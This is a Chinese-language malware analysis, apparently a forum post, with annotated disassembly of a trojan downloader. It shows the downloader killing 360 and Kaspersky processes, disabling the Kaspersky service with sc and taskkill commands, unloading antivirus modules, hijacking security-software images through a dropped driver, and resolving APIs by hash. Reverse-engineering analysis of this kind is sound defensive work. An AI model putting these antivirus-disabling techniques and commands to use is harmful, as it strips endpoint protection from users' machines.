.text:10001956 add esp, 0Ch
.text:10001959 inc edi
.text:1000195A cmp ebx, [edx+IMAGE_OPTIONAL_HEADER32.SizeOfImage]
.text:1000195D jb short loc_1000192B
.text:1000195F
复制代码进入call Kill360Safe看看
下面的废话不多说,建立进程快照遍历进程获取360tray.exe与Zhudongfangyu.exe的进程ID,并把进程ID通过调用DeviceIoControl来结束安全软件进程.text:100024C8 mov [ebp+sz360tray_exe], '3' ; 生成字符串"360tray.exe"
.text:100024CC mov [ebp+sz360tray_exe+1], '6'
.text:100024D0 mov [ebp+sz360tray_exe+2], '0'
.text:100024D4 mov [ebp+sz360tray_exe+3], 't'
.text:100024D8 mov [ebp+sz360tray_exe+4], 'r'
.text:100024DC mov [ebp+sz360tray_exe+5], 'a'
.text:100024E0 mov [ebp+sz360tray_exe+6], 'y'
.text:100024E4 mov [ebp+sz360tray_exe+7], '.'
.text:100024E8 mov [ebp+sz360tray_exe+8], al
.text:100024EB mov [ebp+sz360tray_exe+9], 'x'
.text:100024EF mov [ebp+sz360tray_exe+0Ah], al
.text:100024F2 mov [ebp+sz360tray_exe+0Bh], 0
.text:100024F6 mov [ebp+szZhudongfangyu_exe], 'z' ; 生成字符串"Zhudongfangyu.exe"
.text:100024FA mov [ebp+szZhudongfangyu_exe+1], 'h'
.text:100024FE mov [ebp+szZhudongfangyu_exe+2], bl
.text:10002501 mov [ebp+szZhudongfangyu_exe+3], 'd'
.text:10002505 mov [ebp+szZhudongfangyu_exe+4], 'o'
.text:10002509 mov [ebp+szZhudongfangyu_exe+5], dl
.text:1000250C mov [ebp+szZhudongfangyu_exe+6], cl
.text:1000250F mov [ebp+szZhudongfangyu_exe+7], 'f'
.text:10002513 mov [ebp+szZhudongfangyu_exe+8], 'a'
.text:10002517 mov [ebp+szZhudongfangyu_exe+9], dl
.text:1000251A mov [ebp+szZhudongfangyu_exe+0Ah], cl
.text:1000251D mov [ebp+szZhudongfangyu_exe+0Bh], 'y'
.text:10002521 mov [ebp+szZhudongfangyu_exe+0Ch], bl
.text:10002524 mov [ebp+szZhudongfangyu_exe+0Dh], '.'
.text:10002528 mov [ebp+szZhudongfangyu_exe+0Eh], al
.text:1000252B mov [ebp+szZhudongfangyu_exe+0Fh], 'x'
.text:1000252F mov [ebp+szZhudongfangyu_exe+10h], al
.text:10002532 mov [ebp+szZhudongfangyu_exe+11h], 0
.text:10002536 call CreateToolhelp32Snapshot
.text:1000253B mov esi, eax
.text:1000253D mov [ebp+pe.dwSize], 128h
.text:10002547 push eax
.text:10002548 nop
.text:10002549 pop eax
.text:1000254A lea eax, [ebp+pe]
.text:10002550 push eax ; lppe
.text:10002551 push esi ; hSnapshot
.text:10002552 call Process32First
.text:10002557 test eax, eax
.text:10002559 jz short loc_100025C4
.text:1000255B mov edi, [ebp+arg_0]
.text:1000255E mov ebx, lstrcmpiA
.text:10002564
.text:10002564 loc_10002564: ; CODE XREF: Kill360Safe+112j
.text:10002564 lea ecx, [ebp+sz360tray_exe]
.text:10002567 lea edx, [ebp+pe.szExeFile]
.text:1000256D push ecx ; lpString2
.text:1000256E push edx ; lpString1
.text:1000256F call ebx ; lstrcmpiA ; 比较是否"360tray.exe"进程
.text:10002571 test eax, eax
.text:10002573 jz short loc_10002586
.text:10002575 lea eax, [ebp+szZhudongfangyu_exe]
.text:10002578 lea ecx, [ebp+pe.szExeFile]
.text:1000257E push eax ; lpString2
.text:1000257F push ecx ; lpString1
.text:10002580 call ebx ; lstrcmpiA ; 比较是否"Zhudongfangyu.exe"进程
.text:10002582 test eax, eax
.text:10002584 jnz short GotoNext
.text:10002586
.text:10002586 loc_10002586: ; CODE XREF: Kill360Safe+C3j
.text:10002586 mov edx, [ebp+pe.th32ProcessID]
.text:1000258C push 82E8173h
.text:10002591 push 1
.text:10002593 mov [ebp+dwProcessID], edx
.text:10002596 call GetProcAddressByHashValue
.text:1000259B 发送控制码结束进程
.text:1000259B lea ecx, [ebp+BytesReturned]
.text:1000259E push 0
.text:100025A0 push ecx
.text:100025A1 push 0
.text:100025A3 push 0
.text:100025A5 lea edx, [ebp+dwProcessID]
.text:100025A8 push 4
.text:100025AA push edx
.text:100025AB push 222004h
.text:100025B0 push edi
.text:100025B1 call eax ; DeviceIoControl
.text:100025B3
.text:100025B3 GotoNext: ; CODE XREF: Kill360Safe+D4j
.text:100025B3 lea eax, [ebp+pe]
.text:100025B9 push eax ; lppe
.text:100025BA push esi ; hSnapshot
.text:100025BB call Process32Next
.text:100025C0 test eax, eax
.text:100025C2 jnz short loc_10002564
.text:100025C4
.text:100025C4 loc_100025C4: ; CODE XREF: Kill360Safe+A9j
.text:100025C4 push 723EB0D5h
.text:100025C9 push 1
.text:100025CB call GetProcAddressByHashValue ; 获取CloseHandle函数地址
.text:100025D0 push esi
.text:100025D1 call eax ; CloseHandle
.text:100025D3 push eax
.text:100025D4 nop
.text:100025D5 pop eax
.text:100025D6 pop edi
.text:100025D7 pop esi
.text:100025D8 xor eax, eax
.text:100025DA pop ebx
.text:100025DB mov esp, ebp
.text:100025DD pop ebp
.text:100025DE retn
.text:100025DE Kill360Safe endp
复制代码再进入call KillAvp 看看
1.建立进程快照遍历进程获取进程AVP.EXE的进程ID,并禁用卡巴服务
2.建立卡巴的模块快照再次遍历AVP的模块,并卸载卡马的以下模块
kavbase.kdl
klavemu.kdl
webav.kdl
kjim.kdl
vlns.kdl
mark.kdl
3.最后"taskkill.exe /f /t /im avp.exe"一个结束进程的批处理做掉卡巴
.text:10002280 call CreateToolhelp32Snapshot
.text:10002285 mov edi, eax
.text:10002287 lea eax, [ebp+pe]
.text:1000228D push eax ; lppe
.text:1000228E push edi ; hSnapshot
.text:1000228F mov [ebp+pe.dwSize], 128h
.text:10002299 call Process32First
.text:1000229E test eax, eax
.text:100022A0 jz loc_100023E9
.text:100022A6 mov ebx, lstrcmpiA
.text:100022AC mov esi, lstrcpyA
.text:100022B2
.text:100022B2 loc_100022B2: ; CODE XREF: KillAvp+2C3j
.text:100022B2 push offset aDys1hH ; "dys1h{h"
.text:100022B7 call DecryString ; 解码后"avp.exe"
.text:100022BC add esp, 4
.text:100022BF lea ecx, [ebp+pe.szExeFile]
.text:100022C5 push eax ; lpString2
.text:100022C6 push ecx ; lpString1
.text:100022C7 call ebx ; lstrcmpiA ; 比较是否"avp.exe"进程
.text:100022C9 test eax, eax
.text:100022CB jnz loc_100023D4 ; 未找到"avp.exe"进程跳走
.text:100022D1 nop
.text:100022D2 push eax
.text:100022D3 push eax
.text:100022D4 lea edx, [ebp+szCMDDisabledAvpService]
.text:100022D7 lea eax, [ebp+SC]
.text:100022DA push edx ; "config avp start= disabled"
.text:100022DB push eax ; "sc"
.text:100022DC push 0
.text:100022DE push 0
.text:100022E0 call lpfnShellExecute ; 禁用卡巴服务
.text:100022E6 push 3D9972F5h
.text:100022EB push 1
.text:100022ED call GetProcAddressByHashValue ; 获取Sleep函数地址
.text:100022F2 push 2500
.text:100022F7 call eax ; Sleep
.text:100022F9 nop
.text:100022FA mov edx, [ebp+pe.th32ProcessID]
.text:10002300 lea ecx, [ebp+szKavbase_kdl]
.text:10002303 push ecx ; lpszModuleName
.text:10002304 push edx ; dwProcessId
.text:10002305 call UnloadModule ; 卸载模块
.text:1000230A nop
.text:1000230B mov ecx, [ebp+pe.th32ProcessID]
.text:10002311 lea eax, [ebp+szWebav_kdl]
.text:10002314 push eax ; lpszModuleName
.text:10002315 push ecx ; dwProcessId
.text:10002316 call UnloadModule
.text:1000231B nop
.text:1000231C mov eax, [ebp+pe.th32ProcessID]
.text:10002322 lea edx, [ebp+szVlns_kdl]
.text:10002325 push edx ; lpszModuleName
.text:10002326 push eax ; dwProcessId
.text:10002327 call UnloadModule
.text:1000232C nop
.text:1000232D mov edx, [ebp+pe.th32ProcessID]
.text:10002333 lea ecx, [ebp+szMark_kdl]
.text:10002336 push ecx ; lpszModuleName
.text:10002337 push edx ; dwProcessId
.text:10002338 call UnloadModule
.text:1000233D nop
.text:1000233E mov ecx, [ebp+pe.th32ProcessID]
.text:10002344 lea eax, [ebp+szKlavemu_kdl]
.text:10002347 push eax ; lpszModuleName
.text:10002348 push ecx ; dwProcessId
.text:10002349 call UnloadModule
.text:1000234E nop
.text:1000234F mov eax, [ebp+pe.th32ProcessID]
.text:10002355 lea edx, [ebp+szKjim_kdl]
.text:10002358 push edx ; lpszModuleName
.text:10002359 push eax ; dwProcessId
.text:1000235A call UnloadModule
.text:1000235F add esp, 30h
.text:10002362 push 3D9972F5h
.text:10002367 push 1
.text:10002369 call GetProcAddressByHashValue ; 获取Sleep函数地址
.text:1000236E push 1000
.text:10002373 call eax ; Sleep
.text:10002375 nop
.text:10002376 push offset aWdvnnloo1hH ; "wdvnnloo1h{h"
.text:1000237B call DecryString ; 解密后字符"taskkill.exe"
.text:10002380 add esp, 4
.text:10002383 lea ecx, [ebp+szProcTaskkill_exe]
.text:10002389 push eax ; lpString2
.text:1000238A push ecx ; lpString1
.text:1000238B call esi ; lstrcpyA
.text:1000238D push offset a2i2w2lpDys1hH ; "2i#2w#2lp#dys1h{h"
.text:10002392 call DecryString ; 解密后字符串"/f /t /im avp.exe"
.text:10002397 add esp, 4
.text:1000239A lea edx, [ebp+lpCMDKillAvp]
.text:100023A0 push eax ; lpString2
.text:100023A1 push edx ; lpString1
.text:100023A2 call esi ; lstrcpyA
.text:100023A4 push 0
.text:100023A6 lea eax, [ebp+lpCMDKillAvp]
.text:100023AC push 0
.text:100023AE lea ecx, [ebp+szProcTaskkill_exe]
.text:100023B4 push eax ; "/f /t /im avp.exe"
.text:100023B5 push ecx ; "taskkill.exe"
.text:100023B6 push 0
.text:100023B8 push 0
.text:100023BA call lpfnShellExecute ; 一个处理做掉卡巴
.text:100023C0 push 3D9972F5h
.text:100023C5 push 1
.text:100023C7 call GetProcAddressByHashValue ; 获取Sleep函数地址
.text:100023CC push 4500
.text:100023D1 call eax ; Sleep
.text:100023D3 nop
.text:100023D4
.text:100023D4 loc_100023D4: ; CODE XREF: KillAvp+1ABj
.text:100023D4 lea edx, [ebp+pe]
.text:100023DA push edx ; lppe
.text:100023DB push edi ; hSnapshot
.text:100023DC call Process32Next
.text:100023E1 test eax, eax
.text:100023E3 jnz loc_100022B2
.text:100023E9
.text:100023E9 loc_100023E9: ; CODE XREF: KillAvp+180j
.text:100023E9 push 723EB0D5h
.text:100023EE push 1
.text:100023F0 call GetProcAddressByHashValue ; 获取CloseHandle函数地址
.text:100023F5 push edi
.text:100023F6 call eax ; CloseHandle
.text:100023F8 push eax
.text:100023F9 nop
.text:100023FA pop eax
.text:100023FB pop edi
.text:100023FC pop esi
.text:100023FD xor eax, eax
.text:100023FF pop ebx
.text:10002400 mov esp, ebp
.text:10002402 pop ebp
.text:10002403 retn
.text:10002403 KillAvp endp
复制代码
进入 call ImageExecuteFile
依次访问并解码安全软件的进程字符串数粗
发送控制码劫持安全软件进程
.text:10001A3F
.text:10001A3F loc_10001A3F: ; CODE XREF: ImageExecuteFile+124j
.text:10001A3F mov ecx, 3Fh
.text:10001A44 xor eax, eax
.text:10001A46 lea edi, [ebp+MultiByteStr]
.text:10001A4C rep stosd
.text:10001A4E stosw
.text:10001A50 stosb
.text:10001A51 nop
.text:10001A52 mov eax, [ebp+lpSafeProcList]
.text:10001A55 mov esi, lstrcpyA
.text:10001A5B lea edx, [ebp+MultiByteStr]
.text:10001A61 mov ecx, [eax] ; 取出一个安全进程命名
.text:10001A63 push ecx ; lpString2
.text:10001A64 push edx ; lpString1
.text:10001A65 call esi ; lstrcpyA
.text:10001A67 nop
.text:10001A68 lea eax, [ebp+MultiByteStr]
.text:10001A6E push eax ; lpString
.text:10001A6F call DecryProcName ; 解密进程名
.text:10001A74 add esp, 4
.text:10001A77 lea ecx, [ebp+MultiByteStr]
.text:10001A7D push eax ; lpString2
.text:10001A7E push ecx ; lpString1
.text:10001A7F call esi ; lstrcpyA ; 复制解密后的字符串
.text:10001A81 nop
.text:10001A82 lea edx, [ebp+szExe]
.text:10001A85 lea eax, [ebp+MultiByteStr]
.text:10001A8B push edx ; lpString2
.text:10001A8C push eax ; lpString1
.text:10001A8D call lstrcatA ; 构建完整的进程名
.text:10001A93 nop
.text:10001A94 push 0 ; cchWideChar
.text:10001A96 push 0 ; lpWideCharStr
.text:10001A98 lea ecx, [ebp+MultiByteStr]
.text:10001A9E push -1 ; cbMultiByte
.text:10001AA0 push ecx ; lpMultiByteStr
.text:10001AA1 push 1 ; dwFlags
.text:10001AA3 push 0 ; CodePage
.text:10001AA5 call MultiByteToWideChar ; 计算出进程名长度
.text:10001AAB lea ebx, [eax+eax] ; 进程名长度*2
.text:10001AAE mov [ebp+WideCharSize], eax
.text:10001AB1 push ebx ; dwBytes
.text:10001AB2 push 40h ; uFlags
.text:10001AB4 call GlobalAlloc ; 分配宽字符进程名的空间
.text:10001ABA mov esi, eax
.text:10001ABC test esi, esi
.text:10001ABE jz short loc_10001B0F ; 分配失败跳走
.text:10001AC0 mov ecx, ebx
.text:10001AC2 xor eax, eax
.text:10001AC4 mov edx, ecx
.text:10001AC6 mov edi, esi
.text:10001AC8 shr ecx, 2
.text:10001ACB rep stosd ; 分配的空间内存清0
.text:10001ACD mov ecx, edx
.text:10001ACF and ecx, 3
.text:10001AD2 rep stosb
.text:10001AD4 mov eax, [ebp+WideCharSize]
.text:10001AD7 lea ecx, [ebp+MultiByteStr]
.text:10001ADD push eax ; cchWideChar
.text:10001ADE push esi ; lpWideCharStr
.text:10001ADF push -1 ; cbMultiByte
.text:10001AE1 push ecx ; lpMultiByteStr
.text:10001AE2 push 1 ; dwFlags
.text:10001AE4 push 0 ; CodePage
.text:10001AE6 call MultiByteToWideChar ; 进程名转换成Unicode字符
.text:10001AEC push 82E8173h
.text:10001AF1 push 1
.text:10001AF3 call GetProcAddressByHashValue ; 获取DeviceIoControl进程地址
.text:10001AF8 发送控制码镜像劫持安全软件进程名
.text:10001AF8 mov ecx, [ebp+hDriver]
.text:10001AFB lea edx, [ebp+BytesReturned]
.text:10001AFE push 0
.text:10001B00 push edx
.text:10001B01 push 0
.text:10001B03 push 0
.text:10001B05 push ebx
.text:10001B06 push esi
.text:10001B07 push 22E140h
.text:10001B0C push ecx
.text:10001B0D call eax ; DeviceIoControl
.text:10001B0F
.text:10001B0F loc_10001B0F: ; CODE XREF: ImageExecuteFile+BEj
.text:10001B0F push esi ; hMem
.text:10001B10 call GlobalFree
.text:10001B16 mov eax, [ebp+lpSafeProcList]
.text:10001B19 add eax, 4
.text:10001B1C cmp eax, offset dword_1000124C
.text:10001B21 mov [ebp+lpSafeProcList], eax
.text:10001B24 jl loc_10001A3F ; 未到进程列表未尾继续循环
复制代码
输入法注入的木马下载器完全逆向与分析
http://bbs.pediy.com/showthread.php?p=832346#post832346
【操作平台】: XP-SP3
主要行为:
1.释放文件CCtest.inf,CCtest.sys,CCtest.dll,ring0恢复SSDT,做掉安全软件进程,ring0映像劫持安全软件进程
2.并做安全软件进程释放XXXXscdXXXX.exe下载大小的木马
3.释放文件tmpacik.tmp干掉还原
母体文件释放了五个个文件3120.reg、
CCtest.inf、CCtest.sys、CCtest.dll、 [用于做掉安全软件]
XXXXscdXXXX.exe(XXX为随机名)、 [下载大量木马]
tmpacik.tmp(dll文件) [用于干掉还原软件]
tmpacik.tmp(dll文件)又释放了文件pcidump.sys
建立互斥体防止多个实例同时运行.Upack:0041EB94 add esp, 30h
.Upack:0041EB97 ; .Upack:0041EB97
.Upack:0041EBA0 建立互斥体防止多个实例同时运行
.Upack:0041EBA0
.Upack:0041EBA0 loc_41EBA0: ; CODE XREF: start+BFj
.Upack:0041EBA0 push offset Name ; "LDMMOO."
.Upack:0041EBA5 push ebx ; bInitialOwner
.Upack:0041EBA6 push ebx ; lpMutexAttributes
.Upack:0041EBA7 call CreateMutexA
.Upack:0041EBAD call GetLastError
.Upack:0041EBB3 cmp eax, 0B7h
.Upack:0041EBB8 jnz short loc_41EBC1
.Upack:0041EBBA push ebx ; uExitCode
.Upack:0041EBBB call ExitProcess
复制代码比对函数的Hash值,获取函数地址.Upack:0041EC08 call GetSystemDirectoryA
.Upack:0041EC0E push 774393E8h
.Upack:0041EC13 push 1
.Upack:0041EC15 call __GetProcessAddressByHashValue ; GetModuleFileNameA,
.Upack:0041EC15 ; 比对函数的Hash值,获取函数地址
.Upack:0041EC15 ;
.Upack:0041EC1A lea ecx, [ebp+lpszModuleFileName]
.Upack:0041EC20 push esi
.Upack:0041EC21 push ecx
.Upack:0041EC22 push ebx
.Upack:0041EC23 call eax ; GetModuleFileNameA
复制代码进入__GetProcessAddressByHashValue 看看吧
通过计算函数名的Hash值获取函数地址.Upack:0041F0AF loc_41F0AF: ; CODE XREF: __GetProcessAddressByHashValue+96j
.Upack:0041F0AF mov ecx, [ebp+nFlag]
.Upack:0041F0B2 test ecx, ecx
.Upack:0041F0B4 jz short JMPAndRet ; Kernel32获取失败跳走
.Upack:0041F0B6 mov eax, [ecx+IMAGE_DOS_HEADER.e_lfanew] ; PE头
.Upack:0041F0B9 mov esi, [eax+ecx+IMAGE_NT_HEADERS.OptionalHeader.DataDirectory.VirtualAddress] ; 输出表地址RAV
.Upack:0041F0BD lea edx, [eax+ecx+IMAGE_NT_HEADERS.OptionalHeader] ; 取可选头地址
.Upack:0041F0C1 mov eax, [ebp+HashValue]
.Upack:0041F0C4 add esi, ecx ; 输出表地址VA
.Upack:0041F0C6 shr eax, 10h
.Upack:0041F0C9 test ax, ax
.Upack:0041F0CC mov [ebp+lpOptionHeaders], edx
.Upack:0041F0CF jnz short loc_41F0DA
.Upack:0041F0D1 movzx eax, word ptr [ebp+HashValue]
.Upack:0041F0D5 sub eax, [esi+IMAGE_EXPORT_DIRECTORY.Base]
.Upack:0041F0D8 jmp short loc_41F134
.Upack:0041F0DA ; ---------------------------------------------------------------------------
.Upack:0041F0DA
.Upack:0041F0DA loc_41F0DA: ; CODE XREF: __GetProcessAddressByHashValue+10Aj
.Upack:0041F0DA mov ebx, [esi+IMAGE_EXPORT_DIRECTORY.AddressOfNames]
.Upack:0041F0DD mov eax, [esi+IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals]
.Upack:0041F0E0 and [ebp+dwIndex], 0 ; 初始化计数器
.Upack:0041F0E4 add ebx, ecx ; ENT,导出名字表地址
.Upack:0041F0E6 add eax, ecx ; EOT,导出序号表地址
.Upack:0041F0E8 cmp [esi+IMAGE_EXPORT_DIRECTORY.NumberOfNames], 0 ; 判断按名字导出的是否为0
.Upack:0041F0EC mov [ebp+lpExportTableAddress], eax
.Upack:0041F0EF jbe short loc_41F114 ; 小于等于0跳走
.Upack:0041F0F1 搜索Kernel32的ENT,逐一比较函数名的Hash值
.Upack:0041F0F1
.Upack:0041F0F1 loc_41F0F1: ; CODE XREF: __GetProcessAddressByHashValue+14Dj
.Upack:0041F0F1 mov eax, [ebx] ; 取出一个导出函数名RAV
.Upack:0041F0F3 add eax, [ebp+nFlag] ; 导出函数名VA
.Upack:0041F0F6 push eax ; lpszExportFuncName
.Upack:0041F0F7 call ComputedHashValue ; 计算出函数名的Hash值
.Upack:0041F0FC cmp eax, [ebp+HashValue] ; 对比Hash是否相同
.Upack:0041F0FF pop ecx ; 清栈
.Upack:0041F100 jz short loc_41F126 ; Hash相同证明函数名已经找到
.Upack:0041F102 inc [ebp+dwIndex] ; 计数器加1
.Upack:0041F105 add [ebp+lpExportTableAddress], 2 ; 序号表地址向后移动
.Upack:0041F109 mov eax, [ebp+dwIndex]
.Upack:0041F10C add ebx, 4 ; 移动到下一个导出函数名
.Upack:0041F10F cmp eax, [esi+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
.Upack:0041F112 jb short loc_41F0F1 ; 跳走继续查找下一个函数名
.Upack:0041F114
.Upack:0041F114 loc_41F114: ; CODE XREF: __GetProcessAddressByHashValue+12Aj
.Upack:0041F114 mov eax, [ebp+HashValue]
.Upack:0041F117
.Upack:0041F117 loc_41F117: ; CODE XREF: __GetProcessAddressByHashValue+167j
.Upack:0041F117 mov ecx, [ebp+dwIndex]
.Upack:0041F11A cmp ecx, [esi+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
.Upack:0041F11D jnz short loc_41F12E ; 取出Kernel32基址
.Upack:0041F11F
.Upack:0041F11F JMPAndRet: ; CODE XREF: __GetProcessAddressByHashValue+EFj
.Upack:0041F11F xor eax, eax
.Upack:0041F121 jmp Ret
.Upack:0041F126 ; ---------------------------------------------------------------------------
.Upack:0041F126
.Upack:0041F126 loc_41F126: ; CODE XREF: __GetProcessAddressByHashValue+13Bj
.Upack:0041F126 mov eax, [ebp+lpExportTableAddress]
.Upack:0041F129 movzx eax, word ptr [eax] ; 取出序号
.Upack:0041F12C jmp short loc_41F117
.Upack:0041F12E ; ---------------------------------------------------------------------------
.Upack:0041F12E
.Upack:0041F12E loc_41F12E: ; CODE XREF: __GetProcessAddressByHashValue+158j
.Upack:0041F12E mov ecx, [ebp+nFlag] ; 取出Kernel32基址
.Upack:0041F131 mov edx, [ebp+lpOptionHeaders]
.Upack:0041F134
.Upack:0041F134 loc_41F134: ; CODE XREF: __GetProcessAddressByHashValue+113j
.Upack:0041F134 mov ebx, [esi+IMAGE_EXPORT_DIRECTORY.AddressOfFunctions]
.Upack:0041F137 lea eax, [ebx+eax*4]
.Upack:0041F13A mov ebx, [eax+ecx] ; 导出函数地址RAV
.Upack:0041F13D add ebx, ecx ; 计算出函数的RVA
.Upack:0041F13F mov eax, ebx ; 得到函数的VA
.Upack:0041F141 sub eax, esi
.Upack:0041F143 cmp eax, [edx+IMAGE_OPTIONAL_HEADER32.DataDirectory.Size]
.Upack:0041F146 jnb loc_41F1D8 ; 跳走并返回函数地址
复制代码释放文件并Kill大量的安全软件.Upack:0041ED2D loc_41ED2D: ; CODE XREF: start+24Cj
.Upack:0041ED2D push 6FB89AF0h
.Upack:0041ED32 push 1
.Upack:0041ED34 call __GetProcessAddressByHashValue ; 获取CreateThread地址
.Upack:0041ED39 push ebx
.Upack:0041ED3A push ebx
.Upack:0041ED3B push ebx
.Upack:0041ED3C push offset lpfnThreadProc
.Upack:0041ED41 push ebx
.Upack:0041ED42 push ebx
.Upack:0041ED43 call eax ; CreateThread
.Upack:0041ED45 push 4000
.Upack:0041ED4A call __Sleep
.Upack:0041ED4F ; .Upack:0041ED4F
.Upack:0041ED58
.Upack:0041ED58 loc_41ED58: ; CODE XREF: start+277j
.Upack:0041ED58 call KillSafeSoft ; 释放文件并Kill大量的安全软件
.Upack:0041ED5D mov dword ptr [esp], 7D0h
.Upack:0041ED64 call __Sleep
复制代码进入KillSafeSoft
构建临时目录准备释放注册表文件
构建CMD字符串,用CMD命令把注册表文件导入到注册表
[code.Upack:0041E7AB 构建临时目录准备释放文件
.Upack:0041E7AB add esp, 18h
.Upack:0041E7AE lea eax, [ebp+lpszRegFileName]
.Upack:0041E7B4 push eax ; lpBuffer
.Upack:0041E7B5 push edi ; nBufferLength
.Upack:0041E7B6 call GetTempPathA
.Upack:0041E7BC mov esi, lstrcat
.Upack:0041E7C2 lea eax, [ebp+lpszRegFileName]
.Upack:0041E7C8 push offset a3120_reg ; "3120.reg"
.Upack:0041E7CD push eax
.Upack:0041E7CE call esi ; lstrcat
.Upack:0041E7D0 lea eax, [ebp+lpszRegFileName]
.Upack:0041E7D6 push eax ; lpFileName
.Upack:0041E7D7 call ReleaseRegFile ; 临时目录释放注册表文件"3120.reg"
.Upack:0041E7DC 为导入注册表构建CMD命令
.Upack:0041E7DC lea eax, [ebp+lpCMDImportReg]
.Upack:0041E7E2 mov dword ptr [esp], offset aImport ; "import "
.Upack:0041E7E9 push eax
.Upack:0041E7EA call lstrcpy
.Upack:0041E7F0 lea eax, [ebp+lpszRegFileName]
.Upack:0041E7F6 push eax
.Upack:0041E7F7 lea eax, [ebp+lpCMDImportReg]
.Upack:0041E7FD push eax
.Upack:0041E7FE call esi ; lstrcat
.Upack:0041E800 push ebx
.Upack:0041E801 lea eax, [ebp+lpCMDImportReg]
.Upack:0041E807 push ebx
.Upack:0041E808 push eax
.Upack:0041E809 push offset aReg_exe ; "reg.exe"
.Upack:0041E80E push offset aOpen ; "open"
.Upack:0041E813 push ebx
.Upack:0041E814 call __ShellExecuteA ; 释放的文件导入到注册表
[/code]
更改IP 安全策略服务Upack:0041E823 push ebx
.Upack:0041E824 lea eax, [ebp+szCMDAuto]
.Upack:0041E827 push ebx
.Upack:0041E828 push eax ; "config PolicyAgent start= auto"
.Upack:0041E829 push offset aSc ; "sc"
.Upack:0041E82E push offset aOpen ; "open"
.Upack:0041E833 push ebx
.Upack:0041E834 call __ShellExecuteA ; 配置"IP 安全策略"服务为自动
.Upack:0041E839 push 7D0h
.Upack:0041E83E call __Sleep
.Upack:0041E843 push ebx
.Upack:0041E844 lea eax, [ebp+szCMDStop]
.Upack:0041E847 push ebx
.Upack:0041E848 push eax ; "stop PolicyAgent"
.Upack:0041E849 push offset aSc ; "sc"
.Upack:0041E84E push offset aOpen ; "open"
.Upack:0041E853 push ebx
.Upack:0041E854 call __ShellExecuteA ; 停止"IP 安全策略"服务
.Upack:0041E859 add esp, 50h
.Upack:0041E85C push 7D0h
.Upack:0041E861 call __Sleep
.Upack:0041E866 push ebx
.Upack:0041E867 lea eax, [ebp+szCMDStart]
.Upack:0041E86A push ebx
.Upack:0041E86B push eax ; "start PolicyAgent"
.Upack:0041E86C push offset aSc ; "sc"
.Upack:0041E871 push offset aOpen ; "open"
.Upack:0041E876 push ebx
.Upack:0041E877 call __ShellExecuteA ; 开始"IP 安全策略"服务
.Upack:0041E87C push 7D0h
.Upack:0041E881 call __Sleep
复制代码删除释放的注册表文件.Upack:0041E886 lea eax, [ebp+lpszRegFileName]
.Upack:0041E88C push eax
.Upack:0041E88D call __DeleteFileA ; 删除释放的注册表文件
复制代码释放文件CCtest.inf,CCtest.sys准备加载驱动.Upack:0041E93F 构建文件路径,准备释放文件
.Upack:0041E93F "c:\progra~1\\RAV\CCtest.inf"
.Upack:0041E93F "c:\progra~1\\RAV\CCtest.dll"
.Upack:0041E93F "c:\progra~1\\RAV\CCtest.sys"
.Upack:0041E93F
.Upack:0041E93F loc_41E93F: ; CODE XREF: KillSafeSoft+650j
.Upack:0041E93F lea eax, [ebp+Buffer]
.Upack:0041E945 push eax
.Upack:0041E946 lea eax, [ebp+InfName]
.Upack:0041E94C push eax
.Upack:0041E94D call edi ; lstrcpy
.Upack:0041E94F lea eax, [ebp+szCCtest_inf]
.Upack:0041E952 push eax
.Upack:0041E953 lea eax, [ebp+InfName]
.Upack:0041E959 push eax
.Upack:0041E95A call esi ; lstrcat
.Upack:0041E95C lea eax, [ebp+Buffer]
.Upack:0041E962 push eax
.Upack:0041E963 lea eax, [ebp+SysName]
.Upack:0041E969 push eax
.Upack:0041E96A call edi ; lstrcpy
.Upack:0041E96C lea eax, [ebp+CCtest_sys]
.Upack:0041E96F push eax
.Upack:0041E970 lea eax, [ebp+SysName]
.Upack:0041E976 push eax
.Upack:0041E977 call esi ; lstrcat
.Upack:0041E979 lea eax, [ebp+Buffer]
.Upack:0041E97F push eax
.Upack:0041E980 lea eax, [ebp+DllName]
.Upack:0041E986 push eax
.Upack:0041E987 call edi ; lstrcpy
.Upack:0041E989 lea eax, [ebp+szCCtest_dll]
.Upack:0041E98C push eax
.Upack:0041E98D lea eax, [ebp+DllName]
.Upack:0041E993 push eax
.Upack:0041E994 call esi ; lstrcat
.Upack:0041E996 ; .Upack:0041E996
.Upack:0041E99F
.Upack:0041E99F loc_41E99F: ; CODE XREF: KillSafeSoft+6B0j
.Upack:0041E99F lea eax, [ebp+InfName]
.Upack:0041E9A5 push eax ; lpszInfFileName
.Upack:0041E9A6 call ReleaseInfFile ; 释放文件"c:\progra~1\\RAV\CCtest.inf"
.Upack:0041E9AB test al, al
.Upack:0041E9AD pop ecx
.Upack:0041E9AE jz FailRet ; 释放文件失败跳走
.Upack:0041E9B4 lea eax, [ebp+SysName]
.Upack:0041E9BA push eax ; lpFileName
.Upack:0041E9BB call ReleaseSysFile ; 释放文件"c:\progra~1\\RAV\CCtest.Sys"
.Upack:0041E9C0 test al, al
.Upack:0041E9C2 pop ecx
.Upack:0041E9C3 jz FailRet ; 释放文件失败跳走
复制代码加载驱动.Upack:0041E9CF push offset PropertyBuffer ; "*CCTestDevice"
.Upack:0041E9D4 push eax ; InfName
.Upack:0041E9D5 call LoadDriver ; 加载驱动
.Upack:0041E9DA push 3E8h
.Upack:0041E9DF call __Sleep
.Upack:0041E9E4 push ebx ; MemberIndex
.Upack:0041E9E5 push offset InterfaceClassGuid ; InterfaceClassGuid
.Upack:0041E9EA call EunuInterface ; 获取驱动句柄
.Upack:0041E9EF mov esi, eax
.Upack:0041E9F1 add esp, 14h
.Upack:0041E9F4 cmp esi, ebx
.Upack:0041E9F6 jnz short loc_41EA1A ; 成功跳走
复制代码加载CCtest.dll,并调用testall函数ring0恢复SSDT,做掉安全软件进程,ring0映像劫持安全软件进程Upack:0041EA5A lea eax, [ebp+DllName]
.Upack:0041EA60 push eax
.Upack:0041EA61 call __DeleteFileA
.Upack:0041EA66 pop ecx
.Upack:0041EA67 ; loc_41EA67
.Upack:0041EA70
.Upack:0041EA70 loc_41EA70: ; CODE XREF: KillSafeSoft+781j
.Upack:0041EA70 push 723EB0D5h
.Upack:0041EA75 push 1
.Upack:0041EA77 call __GetProcessAddressByHashValue ; 获取CloseHandle函数地址
.Upack:0041EA7C push esi
.Upack:0041EA7D call eax ; CloseHandle
.Upack:0041EA7F lea eax, [ebp+InfName]
.Upack:0041EA85 push eax ; InfName
.Upack:0041EA86 call UnloadDriver ; 卸载驱动
.Upack:0041EA8B lea eax, [ebp+InfName]
